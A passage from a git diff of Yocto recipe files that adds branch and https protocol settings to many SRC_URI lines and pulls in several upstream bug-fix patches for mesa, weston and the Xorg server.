UPSTREAM_CHECK_GITTAGREGEX = "^(?P<pver>\d+(\.\d+)+)$"
S = "${WORKDIR}/git"
diff --git a/meta/recipes-graphics/igt-gpu-tools/igt-gpu-tools_git.bb b/meta/recipes-graphics/igt-gpu-tools/igt-gpu-tools_git.bb
index 1cc94cf993c..4b8630a318c 100644
--- a/meta/recipes-graphics/igt-gpu-tools/igt-gpu-tools_git.bb
+++ b/meta/recipes-graphics/igt-gpu-tools/igt-gpu-tools_git.bb
@@ -12,7 +12,7 @@ inherit meson
SRCREV = "d16ad07e7f2a028e14d61f570931c87fa5ce404c"
PV = "1.25+git${SRCPV}"
-SRC_URI = "git://gitlab.freedesktop.org/drm/igt-gpu-tools.git;protocol=https \
+SRC_URI = "git://gitlab.freedesktop.org/drm/igt-gpu-tools.git;protocol=https;branch=master \
file://0001-lib-igt_edid-Allocate-raw-8-bytes-for-VSDB.patch \
file://reproducibility.patch"
diff --git a/meta/recipes-graphics/libfakekey/libfakekey_git.bb b/meta/recipes-graphics/libfakekey/libfakekey_git.bb
index ab6f5ac9ed2..33ea6fe5a9a 100644
--- a/meta/recipes-graphics/libfakekey/libfakekey_git.bb
+++ b/meta/recipes-graphics/libfakekey/libfakekey_git.bb
@@ -13,7 +13,7 @@ SECTION = "x11/wm"
SRCREV = "7ad885912efb2131e80914e964d5e635b0d07b40"
PV = "0.3+git${SRCPV}"
-SRC_URI = "git://git.yoctoproject.org/${BPN}"
+SRC_URI = "git://git.yoctoproject.org/${BPN};branch=master"
S = "${WORKDIR}/git"
diff --git a/meta/recipes-graphics/libmatchbox/libmatchbox_1.12.bb b/meta/recipes-graphics/libmatchbox/libmatchbox_1.12.bb
index 1a31677978c..06bd682823f 100644
--- a/meta/recipes-graphics/libmatchbox/libmatchbox_1.12.bb
+++ b/meta/recipes-graphics/libmatchbox/libmatchbox_1.12.bb
@@ -17,7 +17,7 @@ DEPENDS = "virtual/libx11 libxext"
#SRCREV for 1.12
SRCREV = "e846ee434f8e23d9db38af13c523f791495e0e87"
-SRC_URI = "git://git.yoctoproject.org/${BPN}"
+SRC_URI = "git://git.yoctoproject.org/${BPN};branch=master"
S = "${WORKDIR}/git"
diff --git a/meta/recipes-graphics/libva/libva-utils_2.10.0.bb b/meta/recipes-graphics/libva/libva-utils_2.10.0.bb
index 828f4fb3174..39763ba5397 100644
--- a/meta/recipes-graphics/libva/libva-utils_2.10.0.bb
+++ b/meta/recipes-graphics/libva/libva-utils_2.10.0.bb
@@ -14,7 +14,7 @@ SECTION = "x11"
LICENSE = "MIT"
LIC_FILES_CHKSUM = "file://COPYING;md5=b148fc8adf19dc9aec17cf9cd29a9a5e"
-SRC_URI = "git://github.com/intel/libva-utils.git;branch=v2.10-branch"
+SRC_URI = "git://github.com/intel/libva-utils.git;branch=v2.10-branch;protocol=https"
SRCREV = "f112ee75fcd1472131b20f901b93f6ac1d293fad"
S = "${WORKDIR}/git"
diff --git a/meta/recipes-graphics/matchbox-wm/matchbox-wm_1.2.2.bb b/meta/recipes-graphics/matchbox-wm/matchbox-wm_1.2.2.bb
index a08eb252ce0..3ea67d09d6c 100644
--- a/meta/recipes-graphics/matchbox-wm/matchbox-wm_1.2.2.bb
+++ b/meta/recipes-graphics/matchbox-wm/matchbox-wm_1.2.2.bb
@@ -12,7 +12,7 @@ DEPENDS = "libmatchbox virtual/libx11 libxext libxrender startup-notification ex
# SRCREV tagged 1.2.2
SRCREV = "27da947e7fbdf9659f7e5bd1e92af92af6c03970"
-SRC_URI = "git://git.yoctoproject.org/matchbox-window-manager \
+SRC_URI = "git://git.yoctoproject.org/matchbox-window-manager;branch=master \
file://0001-Fix-build-with-gcc-10.patch \
file://kbdconfig"
diff --git a/meta/recipes-graphics/mesa/files/0001-gallium-dri-Make-YUV-formats-we-re-going-to-emulate-.patch b/meta/recipes-graphics/mesa/files/0001-gallium-dri-Make-YUV-formats-we-re-going-to-emulate-.patch
new file mode 100644
index 00000000000..899450eb2a7
--- /dev/null
+++ b/meta/recipes-graphics/mesa/files/0001-gallium-dri-Make-YUV-formats-we-re-going-to-emulate-.patch
@@ -0,0 +1,52 @@
+commit 8bd63cd28939d79d6681943b840627eaa3614ee4
+Author: Pablo Saavedra <psaavedra@igalia.com>
+Date: Mon Oct 18 15:48:42 2021 +0200
+
+ gallium/dri: Make YUV formats we're going to emulate external-only.
+
+ If we're going to have to bind them as separate planes with colorspace
+ conversion for sampling on the frontend, then we need to report that
+ they're only for external-image samplers, otherwise the lowering won't be
+ applied.
+
+ Fixes: 4e3a7dcf ("gallium: enable EGL_EXT_image_dma_buf_import_modifiers unconditionally")
+ Reviewed-by: Jose Maria Casanova Crespo <jmcasanova@igalia.com>
+ Part-of: <https://gitlab.freedesktop.org/mesa/mesa/-/merge_requests/13038>
+
+Upstream-Status: Backport [https://gitlab.freedesktop.org/mesa/mesa/-/merge_requests/13038]
+
+diff --git a/src/gallium/frontends/dri/dri2.c b/src/gallium/frontends/dri/dri2.c
+index b0c0d7e..ef8df5a 100644
+--- a/src/gallium/frontends/dri/dri2.c
++++ b/src/gallium/frontends/dri/dri2.c
+@@ -1445,16 +1445,24 @@ dri2_query_dma_buf_modifiers(__DRIscreen *_screen, int fourcc, int max,
+
+ format = map->pipe_format;
+
++ bool native_sampling = pscreen->is_format_supported(pscreen, format, screen->target, 0, 0,
++ PIPE_BIND_SAMPLER_VIEW);
+ if (pscreen->is_format_supported(pscreen, format, screen->target, 0, 0,
+- PIPE_BIND_RENDER_TARGET) ||
+- pscreen->is_format_supported(pscreen, format, screen->target, 0, 0,
+- PIPE_BIND_SAMPLER_VIEW) ||
+- dri2_yuv_dma_buf_supported(screen, map)) {
+- if (pscreen->query_dmabuf_modifiers != NULL)
++ PIPE_BIND_RENDER_TARGET) ||
++ native_sampling ||
++ dri2_yuv_dma_buf_supported(screen, map)) {
++ if (pscreen->query_dmabuf_modifiers != NULL) {
+ pscreen->query_dmabuf_modifiers(pscreen, format, max, modifiers,
+ external_only, count);
+- else
++ if (!native_sampling && external_only) {
++ /* To support it using YUV lowering, we need it to be samplerExternalOES.
++ */
++ for (int i = 0; i < *count; i++)
++ external_only[i] = true;
++ }
++ } else {
+ *count = 0;
++ }
+ return true;
+ }
+ return false;
diff --git a/meta/recipes-graphics/mesa/mesa.inc b/meta/recipes-graphics/mesa/mesa.inc
index a85f94c75ea..cfc1bc1d366 100644
--- a/meta/recipes-graphics/mesa/mesa.inc
+++ b/meta/recipes-graphics/mesa/mesa.inc
@@ -19,6 +19,7 @@ SRC_URI = "https://mesa.freedesktop.org/archive/mesa-${PV}.tar.xz \
file://0002-meson.build-make-TLS-ELF-optional.patch \
file://0001-meson-misdetects-64bit-atomics-on-mips-clang.patch \
file://0001-futex.h-Define-__NR_futex-if-it-does-not-exist.patch \
+ file://0001-gallium-dri-Make-YUV-formats-we-re-going-to-emulate-.patch \
"
SRC_URI[sha256sum] = "565c6f4bd2d5747b919454fc1d439963024fc78ca56fd05158c3b2cde2f6912b"
@@ -252,7 +253,7 @@ python mesa_populate_packages() {
import re
dri_drivers_root = oe.path.join(d.getVar('PKGD'), d.getVar('libdir'), "dri")
if os.path.isdir(dri_drivers_root):
- dri_pkgs = os.listdir(dri_drivers_root)
+ dri_pkgs = sorted(os.listdir(dri_drivers_root))
lib_name = d.expand("${MLPREFIX}mesa-megadriver")
for p in dri_pkgs:
m = re.match(r'^(.*)_dri\.so$', p)
diff --git a/meta/recipes-graphics/mx/mx-1.0_1.4.7.bb b/meta/recipes-graphics/mx/mx-1.0_1.4.7.bb
index 58a6997ffe0..88101b5dccb 100644
--- a/meta/recipes-graphics/mx/mx-1.0_1.4.7.bb
+++ b/meta/recipes-graphics/mx/mx-1.0_1.4.7.bb
@@ -7,7 +7,7 @@ PV = "1.4.7+git${SRCPV}"
# Exclude x.99.x versions from upstream checks
UPSTREAM_CHECK_GITTAGREGEX = "(?P<pver>^\d+(\.(?!99)\d+)+)"
-SRC_URI = "git://github.com/clutter-project/mx.git;branch=mx-1.4 \
+SRC_URI = "git://github.com/clutter-project/mx.git;branch=mx-1.4;protocol=https \
file://fix-test-includes.patch \
"
S = "${WORKDIR}/git"
diff --git a/meta/recipes-graphics/piglit/piglit_git.bb b/meta/recipes-graphics/piglit/piglit_git.bb
index 14f4c75a2cb..96ec93071d7 100644
--- a/meta/recipes-graphics/piglit/piglit_git.bb
+++ b/meta/recipes-graphics/piglit/piglit_git.bb
@@ -6,7 +6,7 @@ BUGTRACKER = "https://gitlab.freedesktop.org/mesa/piglit/-/issues"
LICENSE = "MIT & LGPLv2+ & GPLv3 & GPLv2+ & BSD-3-Clause"
LIC_FILES_CHKSUM = "file://COPYING;md5=b2beded7103a3d8a442a2a0391d607b0"
-SRC_URI = "git://gitlab.freedesktop.org/mesa/piglit.git;protocol=https \
+SRC_URI = "git://gitlab.freedesktop.org/mesa/piglit.git;protocol=https;branch=master \
file://0001-cmake-install-bash-completions-in-the-right-place.patch \
file://0001-cmake-use-proper-WAYLAND_INCLUDE_DIRS-variable.patch \
file://0001-Add-a-missing-include-for-htobe32-definition.patch \
diff --git a/meta/recipes-graphics/spir/spirv-headers_1.5.4.bb b/meta/recipes-graphics/spir/spirv-headers_1.5.4.bb
index 7a43af5e6bc..ea7e17305e2 100644
--- a/meta/recipes-graphics/spir/spirv-headers_1.5.4.bb
+++ b/meta/recipes-graphics/spir/spirv-headers_1.5.4.bb
@@ -8,7 +8,7 @@ LICENSE = "MIT"
LIC_FILES_CHKSUM = "file://LICENSE;md5=c938b85bceb8fb26c1a807f28a52ae2d"
SRCREV = "bcf55210f13a4fa3c3d0963b509ff1070e434c79"
-SRC_URI = "git://github.com/KhronosGroup/SPIRV-Headers;protocol=https"
+SRC_URI = "git://github.com/KhronosGroup/SPIRV-Headers;protocol=https;branch=master"
UPSTREAM_CHECK_GITTAGREGEX = "^(?P<pver>\d+(\.\d+)+)$"
S = "${WORKDIR}/git"
PV .= "+git${SRCPV}"
diff --git a/meta/recipes-graphics/spir/spirv-tools_2020.7.bb b/meta/recipes-graphics/spir/spirv-tools_2020.7.bb
index 8be698533af..9a06408526a 100644
--- a/meta/recipes-graphics/spir/spirv-tools_2020.7.bb
+++ b/meta/recipes-graphics/spir/spirv-tools_2020.7.bb
@@ -8,7 +8,7 @@ LICENSE = "Apache-2.0"
LIC_FILES_CHKSUM = "file://LICENSE;md5=3b83ef96387f14655fc854ddc3c6bd57"
SRCREV = "2573fd781b5408cd7fe5755a78b60d767a748ff9"
-SRC_URI = "git://github.com/KhronosGroup/SPIRV-Tools.git \
+SRC_URI = "git://github.com/KhronosGroup/SPIRV-Tools.git;branch=master;protocol=https \
file://0001-fix-strncpy-bound-error.patch \
"
UPSTREAM_CHECK_GITTAGREGEX = "^v(?P<pver>\d+(\.\d+)+)$"
diff --git a/meta/recipes-graphics/virglrenderer/virglrenderer_0.8.2.bb b/meta/recipes-graphics/virglrenderer/virglrenderer_0.8.2.bb
index 52821195d1a..7f035f820aa 100644
--- a/meta/recipes-graphics/virglrenderer/virglrenderer_0.8.2.bb
+++ b/meta/recipes-graphics/virglrenderer/virglrenderer_0.8.2.bb
@@ -10,7 +10,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=c81c08eeefd9418fca8f88309a76db10"
DEPENDS = "libdrm virtual/libgl libepoxy"
SRCREV = "7d204f3927be65fb3365dce01dbcd04d447a4985"
-SRC_URI = "git://anongit.freedesktop.org/virglrenderer \
+SRC_URI = "git://anongit.freedesktop.org/virglrenderer;branch=master \
file://0001-gallium-Expand-libc-check-to-be-platform-OS-check.patch \
file://0001-meson.build-use-python3-directly-for-python.patch \
"
diff --git a/meta/recipes-graphics/vulkan/assimp_5.0.1.bb b/meta/recipes-graphics/vulkan/assimp_5.0.1.bb
index 5a8c62e64dd..295ac12fc59 100644
--- a/meta/recipes-graphics/vulkan/assimp_5.0.1.bb
+++ b/meta/recipes-graphics/vulkan/assimp_5.0.1.bb
@@ -8,7 +8,7 @@ LIC_FILES_CHKSUM = "file://LICENSE;md5=2119edef0916b0bd511cb3c731076271"
DEPENDS = "zlib"
-SRC_URI = "git://github.com/assimp/assimp.git;branch=assimp_5.0_release \
+SRC_URI = "git://github.com/assimp/assimp.git;branch=assimp_5.0_release;protocol=https \
file://0001-closes-https-github.com-assimp-assimp-issues-2733-up.patch \
file://0001-Use-ASSIMP_LIB_INSTALL_DIR-to-search-library.patch \
"
diff --git a/meta/recipes-graphics/vulkan/vulkan-headers_1.2.170.0.bb b/meta/recipes-graphics/vulkan/vulkan-headers_1.2.170.0.bb
index 4c9c94f3d26..b0211432ab6 100644
--- a/meta/recipes-graphics/vulkan/vulkan-headers_1.2.170.0.bb
+++ b/meta/recipes-graphics/vulkan/vulkan-headers_1.2.170.0.bb
@@ -9,7 +9,7 @@ SECTION = "libs"
LICENSE = "Apache-2.0"
LIC_FILES_CHKSUM = "file://LICENSE.txt;md5=3b83ef96387f14655fc854ddc3c6bd57"
-SRC_URI = "git://github.com/KhronosGroup/Vulkan-Headers.git;branch=master"
+SRC_URI = "git://github.com/KhronosGroup/Vulkan-Headers.git;branch=master;protocol=https"
SRCREV = "1d99b835ec3cd5a7fb2f2a2dd9a615ee2d1f0101"
diff --git a/meta/recipes-graphics/vulkan/vulkan-loader_1.2.170.0.bb b/meta/recipes-graphics/vulkan/vulkan-loader_1.2.170.0.bb
index 6b6ed06dbb3..a866f0a5cbf 100644
--- a/meta/recipes-graphics/vulkan/vulkan-loader_1.2.170.0.bb
+++ b/meta/recipes-graphics/vulkan/vulkan-loader_1.2.170.0.bb
@@ -9,7 +9,7 @@ SECTION = "libs"
LICENSE = "Apache-2.0"
LIC_FILES_CHKSUM = "file://LICENSE.txt;md5=7dbefed23242760aa3475ee42801c5ac"
-SRC_URI = "git://github.com/KhronosGroup/Vulkan-Loader.git \
+SRC_URI = "git://github.com/KhronosGroup/Vulkan-Loader.git;branch=master;protocol=https \
"
SRCREV = "c5678a03db383fd0dc5bfb8e9a383043bdbcb57b"
diff --git a/meta/recipes-graphics/vulkan/vulkan-samples_git.bb b/meta/recipes-graphics/vulkan/vulkan-samples_git.bb
index b7c38f65438..07d6e9d7359 100644
--- a/meta/recipes-graphics/vulkan/vulkan-samples_git.bb
+++ b/meta/recipes-graphics/vulkan/vulkan-samples_git.bb
@@ -5,7 +5,7 @@ LICENSE = "Apache-2.0"
LIC_FILES_CHKSUM = "file://LICENSE;md5=48aa35cefb768436223a6e7f18dc2a2a"
-SRC_URI = "gitsm://github.com/KhronosGroup/Vulkan-Samples.git \
+SRC_URI = "gitsm://github.com/KhronosGroup/Vulkan-Samples.git;branch=master;protocol=https \
file://0001-CMakeLists.txt-do-not-hardcode-lib-as-installation-t.patch \
file://debugfix.patch \
"
diff --git a/meta/recipes-graphics/vulkan/vulkan-tools_1.2.170.0.bb b/meta/recipes-graphics/vulkan/vulkan-tools_1.2.170.0.bb
index 0c8bcaa0858..d81dc144720 100644
--- a/meta/recipes-graphics/vulkan/vulkan-tools_1.2.170.0.bb
+++ b/meta/recipes-graphics/vulkan/vulkan-tools_1.2.170.0.bb
@@ -6,7 +6,7 @@ SECTION = "libs"
LICENSE = "Apache-2.0"
LIC_FILES_CHKSUM = "file://LICENSE.txt;md5=3b83ef96387f14655fc854ddc3c6bd57"
-SRC_URI = "git://github.com/KhronosGroup/Vulkan-Tools.git;branch=sdk-1.2.170"
+SRC_URI = "git://github.com/KhronosGroup/Vulkan-Tools.git;branch=sdk-1.2.170;protocol=https"
SRCREV = "88ea55de928a08ba5c5f65a93d1e7c8f666fc43f"
S = "${WORKDIR}/git"
diff --git a/meta/recipes-graphics/waffle/waffle_1.6.1.bb b/meta/recipes-graphics/waffle/waffle_1.6.1.bb
index 07d7279c2b0..5e5b227a406 100644
--- a/meta/recipes-graphics/waffle/waffle_1.6.1.bb
+++ b/meta/recipes-graphics/waffle/waffle_1.6.1.bb
@@ -3,17 +3,15 @@ DESCRIPTION = "A cross-platform C library that allows one to defer selection \
of an OpenGL API and window system until runtime. For example, on Linux, Waffle \
enables an application to select X11/EGL with an OpenGL 3.3 core profile, \
Wayland with OpenGL ES2, and other window system / API combinations."
-HOMEPAGE = "http://www.waffle-gl.org/"
+HOMEPAGE = "https://gitlab.freedesktop.org/mesa/waffle"
BUGTRACKER = "https://gitlab.freedesktop.org/mesa/waffle"
LICENSE = "BSD-2-Clause"
LIC_FILES_CHKSUM = "file://LICENSE.txt;md5=4c5154407c2490750dd461c50ad94797 \
file://include/waffle/waffle.h;endline=24;md5=61dbf8697f61c78645e75a93c585b1bf"
-SRC_URI = "http://waffle-gl.org/files/release/${BPN}-${PV}/${BPN}-${PV}.tar.xz"
-SRC_URI[md5sum] = "c91529e579483f44fb330052872b9c73"
-SRC_URI[sha256sum] = "31565649ff0e2d8dff1b8f7f2264ab7a78452063c7e04adfc4ce03e64b655080"
-
-UPSTREAM_CHECK_URI = "http://www.waffle-gl.org/releases.html"
+SRC_URI = "git://gitlab.freedesktop.org/mesa/waffle.git;protocol=https;branch=maint-1.6"
+SRCREV = "d7e8c4759704b3c571fa3697c716279c26fd05eb"
+S = "${WORKDIR}/git"
inherit meson features_check lib_package bash-completion
diff --git a/meta/recipes-graphics/wayland/wayland-protocols_1.20.bb b/meta/recipes-graphics/wayland/wayland-protocols_1.20.bb
index 3fb78f658c9..35a46dbb081 100644
--- a/meta/recipes-graphics/wayland/wayland-protocols_1.20.bb
+++ b/meta/recipes-graphics/wayland/wayland-protocols_1.20.bb
@@ -20,3 +20,7 @@ inherit allarch autotools pkgconfig
PACKAGES = "${PN}"
FILES_${PN} += "${datadir}/pkgconfig/wayland-protocols.pc"
+
+# remove at next version upgrade or when output changes
+PR = "r1"
+HASHEQUIV_HASH_VERSION .= ".1"
diff --git a/meta/recipes-graphics/wayland/weston/0001-libweston-backend-drm-Re-order-gbm-destruction-at-DR.patch b/meta/recipes-graphics/wayland/weston/0001-libweston-backend-drm-Re-order-gbm-destruction-at-DR.patch
new file mode 100644
index 00000000000..f8f7589499d
--- /dev/null
+++ b/meta/recipes-graphics/wayland/weston/0001-libweston-backend-drm-Re-order-gbm-destruction-at-DR.patch
@@ -0,0 +1,50 @@
+From c8bfa1f8d576cdc6d515dbbac36c48c6166be0d5 Mon Sep 17 00:00:00 2001
+From: Marius Vlad <marius.vlad@collabora.com>
+Date: Thu, 1 Apr 2021 00:12:00 +0300
+Subject: [PATCH] libweston/backend-drm: Re-order gbm destruction at DRM-backend tear down
+
+Tearing down the drm-backend when there are no input devices, would call
+for the gbm device destruction before compositor shutdown. The latter
+would call into the renderer detroy function and assume that the
+EGLDisplay, which was created using the before-mentioned gbm device, is
+still available. This patch re-orders the gbm destruction after the
+compositor shutdown when no one would make use of it.
+
+Fixes: #314
+
+Signed-off-by: Marius Vlad <marius.vlad@collabora.com>
+Suggested-by: Daniel Stone <daniel.stone@collabora.com>
+
+Upstream-Status: Backport [https://gitlab.freedesktop.org/wayland/weston/-/commit/d171c7b3ba346c4d0bd6494f45ebf0be3c3cc5fb]
+---
+ libweston/backend-drm/drm.c | 8 ++++----
+ 1 file changed, 4 insertions(+), 4 deletions(-)
+
+diff --git a/libweston/backend-drm/drm.c b/libweston/backend-drm/drm.c
+index 2780f3b..fbcfeca 100644
+--- a/libweston/backend-drm/drm.c
++++ b/libweston/backend-drm/drm.c
+@@ -3025,10 +3025,6 @@ err_drm_source:
+ err_udev_input:
+ udev_input_destroy(&b->input);
+ err_sprite:
+-#ifdef BUILD_DRM_GBM
+- if (b->gbm)
+- gbm_device_destroy(b->gbm);
+-#endif
+ destroy_sprites(b);
+ err_udev_dev:
+ udev_device_unref(drm_device);
+@@ -3038,6 +3034,10 @@ err_launcher:
+ weston_launcher_destroy(compositor->launcher);
+ err_compositor:
+ weston_compositor_shutdown(compositor);
++#ifdef BUILD_DRM_GBM
++ if (b->gbm)
++ gbm_device_destroy(b->gbm);
++#endif
+ free(b);
+ return NULL;
+ }
+--
+2.33.0
diff --git a/meta/recipes-graphics/wayland/weston_9.0.0.bb b/meta/recipes-graphics/wayland/weston_9.0.0.bb
index bcbac06d582..ef12cb8c852 100644
--- a/meta/recipes-graphics/wayland/weston_9.0.0.bb
+++ b/meta/recipes-graphics/wayland/weston_9.0.0.bb
@@ -12,6 +12,7 @@ SRC_URI = "https://wayland.freedesktop.org/releases/${BPN}-${PV}.tar.xz \
file://0001-weston-launch-Provide-a-default-version-that-doesn-t.patch \
file://0001-tests-include-fcntl.h-for-open-O_RDWR-O_CLOEXEC-and-.patch \
file://0001-meson.build-fix-incorrect-header.patch \
+ file://0001-libweston-backend-drm-Re-order-gbm-destruction-at-DR.patch \
"
SRC_URI_append_libc-musl = " file://dont-use-plane-add-prop.patch "
diff --git a/meta/recipes-graphics/xinput-calibrator/xinput-calibrator_git.bb b/meta/recipes-graphics/xinput-calibrator/xinput-calibrator_git.bb
index d2a16643fe4..e524b82dd62 100644
--- a/meta/recipes-graphics/xinput-calibrator/xinput-calibrator_git.bb
+++ b/meta/recipes-graphics/xinput-calibrator/xinput-calibrator_git.bb
@@ -12,7 +12,7 @@ inherit autotools pkgconfig features_check
REQUIRED_DISTRO_FEATURES = "x11"
SRCREV = "18ec53f1cada39f905614ebfaffed5c7754ecf46"
-SRC_URI = "git://github.com/kreijack/xinput_calibrator.git;branch=libinput \
+SRC_URI = "git://github.com/kreijack/xinput_calibrator.git;branch=libinput;protocol=https \
file://30xinput_calibrate.sh \
file://Allow-xinput_calibrator_pointercal.sh-to-be-run-as-n.patch \
file://0001-calibrator.hh-Include-string-to-get-std-string.patch \
diff --git a/meta/recipes-graphics/xorg-driver/xf86-video-intel_git.bb b/meta/recipes-graphics/xorg-driver/xf86-video-intel_git.bb
index 161371b1183..73c0cdc3856 100644
--- a/meta/recipes-graphics/xorg-driver/xf86-video-intel_git.bb
+++ b/meta/recipes-graphics/xorg-driver/xf86-video-intel_git.bb
@@ -13,7 +13,7 @@ SRCREV = "f66d39544bb8339130c96d282a80f87ca1606caf"
PV = "2.99.917+git${SRCPV}"
S = "${WORKDIR}/git"
-SRC_URI = "git://anongit.freedesktop.org/xorg/driver/xf86-video-intel \
+SRC_URI = "git://anongit.freedesktop.org/xorg/driver/xf86-video-intel;branch=master \
file://0001-Sync-i915_pciids-upto-8717c6b7414f.patch \
file://0001-i810-Avoid-duplicate-definition-of-I810PatternROP.patch \
"
diff --git a/meta/recipes-graphics/xorg-font/encodings_1.0.5.bb b/meta/recipes-graphics/xorg-font/encodings_1.0.5.bb
index 713fcfb9354..02c8cff25d9 100644
--- a/meta/recipes-graphics/xorg-font/encodings_1.0.5.bb
+++ b/meta/recipes-graphics/xorg-font/encodings_1.0.5.bb
@@ -23,3 +23,7 @@ EXTRA_OECONF += "--with-encodingsdir=${datadir}/fonts/X11/encodings"
# postinst from .inc doesn't apply to this recipe
pkg_postinst_${PN} () {
}
+
+# remove at next version upgrade or when output changes
+PR = "r1"
+HASHEQUIV_HASH_VERSION .= ".1"
diff --git a/meta/recipes-graphics/xorg-lib/pixman_0.40.0.bb b/meta/recipes-graphics/xorg-lib/pixman_0.40.0.bb
index 5a3bb22ec39..00dd68006fa 100644
--- a/meta/recipes-graphics/xorg-lib/pixman_0.40.0.bb
+++ b/meta/recipes-graphics/xorg-lib/pixman_0.40.0.bb
@@ -31,5 +31,7 @@ EXTRA_OEMESON = "-Dgtk=disabled -Dlibpng=disabled"
# ld: pixman/libpixman-mmx.a(pixman-mmx.c.o):
# linking mips:loongson_2f module with previous mips:isa64 modules
EXTRA_OEMESON += "-Dloongson-mmi=disabled"
+# disable iwmmxt due to compile fails on most arm platforms.
+EXTRA_OEMESON += "-Diwmmxt=disabled"
BBCLASSEXTEND = "native nativesdk"
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg/0001-hw-xwayland-Makefile.am-fix-build-without-glx.patch b/meta/recipes-graphics/xorg-xserver/xserver-xorg/0001-hw-xwayland-Makefile.am-fix-build-without-glx.patch
new file mode 100644
index 00000000000..4c9cb0ebb2f
--- /dev/null
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg/0001-hw-xwayland-Makefile.am-fix-build-without-glx.patch
@@ -0,0 +1,46 @@
+From 836f93de99b35050d78d61d3654f7c5655184144 Mon Sep 17 00:00:00 2001
+From: Fabrice Fontaine <fontaine.fabrice@gmail.com>
+Date: Fri, 19 Apr 2019 10:19:50 +0200
+Subject: [PATCH] hw/xwayland/Makefile.am: fix build without glx
+
+Commit d8ec33fe0542141aed1d9016d2ecaf52da944b4b added libglxvnd.la to
+Xwayland_LDFLAGS but GLX can be disabled through --disable-glx.
+In this case, build fails on:
+
+make[3]: *** No rule to make target '../../glx/libglxvnd.la', needed by 'Xwayland'. Stop.
+make[3]: *** Waiting for unfinished jobs....
+
+Fixes:
+ - http://autobuild.buildroot.org/results/397f8098c57fc6c88aa12dc8d35ebb1b933d52ef
+
+Signed-off-by: Fabrice Fontaine <fontaine.fabrice@gmail.com>
+
+Upstream-Status: Backport [https://gitlab.freedesktop.org/xorg/xserver/-/commit/836f93de99b35050d78d61d3654f7c5655184144]
+Signed-off-by: Wadim Egorov <w.egorov@phytec.de>
+---
+ hw/xwayland/Makefile.am | 6 +++++-
+ 1 file changed, 5 insertions(+), 1 deletion(-)
+
+diff --git a/hw/xwayland/Makefile.am b/hw/xwayland/Makefile.am
+index bc1cb8506..502879e2a 100644
+--- a/hw/xwayland/Makefile.am
++++ b/hw/xwayland/Makefile.am
+@@ -21,10 +21,14 @@ Xwayland_SOURCES = \
+ $(top_srcdir)/Xi/stubs.c \
+ $(top_srcdir)/mi/miinitext.c
+
++if GLX
++GLXVND_LIB = $(top_builddir)/glx/libglxvnd.la
++endif
++
+ Xwayland_LDADD = \
+ $(glamor_lib) \
+ $(XWAYLAND_LIBS) \
+- $(top_builddir)/glx/libglxvnd.la \
++ $(GLXVND_LIB) \
+ $(XWAYLAND_SYS_LIBS) \
+ $(top_builddir)/Xext/libXvidmode.la \
+ $(XSERVER_SYS_LIBS)
+--
+2.25.1
+
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg_1.20.10.bb b/meta/recipes-graphics/xorg-xserver/xserver-xorg_1.20.10.bb
index 755a762a73f..e0551fa9996 100644
--- a/meta/recipes-graphics/xorg-xserver/xserver-xorg_1.20.10.bb
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg_1.20.10.bb
@@ -8,6 +8,7 @@ SRC_URI += "file://0001-xf86pciBus.c-use-Intel-ddx-only-for-pre-gen4-hardwar.pat
file://0001-Avoid-duplicate-definitions-of-IOPortBase.patch \
file://0001-Fix-segfault-on-probing-a-non-PCI-platform-device-on.patch \
file://CVE-2021-3472.patch \
+ file://0001-hw-xwayland-Makefile.am-fix-build-without-glx.patch \
"
SRC_URI[sha256sum] = "977420c082450dc808de301ef56af4856d653eea71519a973c3490a780cb7c99"
diff --git a/meta/recipes-kernel/blktrace/blktrace_git.bb b/meta/recipes-kernel/blktrace/blktrace_git.bb
index 7ccc022b931..2110bc75fa1 100644
--- a/meta/recipes-kernel/blktrace/blktrace_git.bb
+++ b/meta/recipes-kernel/blktrace/blktrace_git.bb
@@ -14,7 +14,7 @@ SRCREV = "cca113f2fe0759b91fd6a0e10fdcda2c28f18a7e"
PV = "1.2.0+git${SRCPV}"
-SRC_URI = "git://git.kernel.dk/blktrace.git \
+SRC_URI = "git://git.kernel.dk/blktrace.git;branch=master \
file://ldflags.patch \
file://CVE-2018-10689.patch \
file://make-btt-scripts-python3-ready.patch \
diff --git a/meta/recipes-kernel/cryptodev/cryptodev.inc b/meta/recipes-kernel/cryptodev/cryptodev.inc
index ae2c3089119..6ada0b0295b 100644
--- a/meta/recipes-kernel/cryptodev/cryptodev.inc
+++ b/meta/recipes-kernel/cryptodev/cryptodev.inc
@@ -8,7 +8,7 @@ API is compatible with OpenBSD's cryptodev userspace API (/dev/crypto)."
LICENSE = "GPLv2"
LIC_FILES_CHKSUM = "file://COPYING;md5=b234ee4d69f5fce4486a80fdaf4a4263"
-SRC_URI = "git://github.com/cryptodev-linux/cryptodev-linux \
+SRC_URI = "git://github.com/cryptodev-linux/cryptodev-linux;branch=master;protocol=https \
"
SRCREV = "e0c25e289d6baf1d83c2b9cb523d3bc237d0c0c9"
diff --git a/meta/recipes-kernel/dtc/dtc.inc b/meta/recipes-kernel/dtc/dtc.inc
index 5da6c24fbf4..461ab8fbd31 100644
--- a/meta/recipes-kernel/dtc/dtc.inc
+++ b/meta/recipes-kernel/dtc/dtc.inc
@@ -5,7 +5,7 @@ SECTION = "bootloader"
LICENSE = "GPLv2 | BSD"
DEPENDS = "flex-native bison-native"
-SRC_URI = "git://git.kernel.org/pub/scm/utils/dtc/dtc.git \
+SRC_URI = "git://git.kernel.org/pub/scm/utils/dtc/dtc.git;branch=master \
file://make_install.patch \
file://0001-dtc-Fix-Makefile-to-add-CFLAGS-not-override.patch \
"
diff --git a/meta/recipes-kernel/kern-tools/kern-tools-native_git.bb b/meta/recipes-kernel/kern-tools/kern-tools-native_git.bb
index e967f485c17..ef035aed238 100644
--- a/meta/recipes-kernel/kern-tools/kern-tools-native_git.bb
+++ b/meta/recipes-kernel/kern-tools/kern-tools-native_git.bb
@@ -14,7 +14,7 @@ PV = "0.2+git${SRCPV}"
inherit native
-SRC_URI = "git://git.yoctoproject.org/yocto-kernel-tools.git"
+SRC_URI = "git://git.yoctoproject.org/yocto-kernel-tools.git;branch=master"
S = "${WORKDIR}/git"
UPSTREAM_CHECK_COMMITS = "1"
diff --git a/meta/recipes-kernel/kmod/kmod.inc b/meta/recipes-kernel/kmod/kmod.inc
index ba5ec7f650a..11220c51383 100644
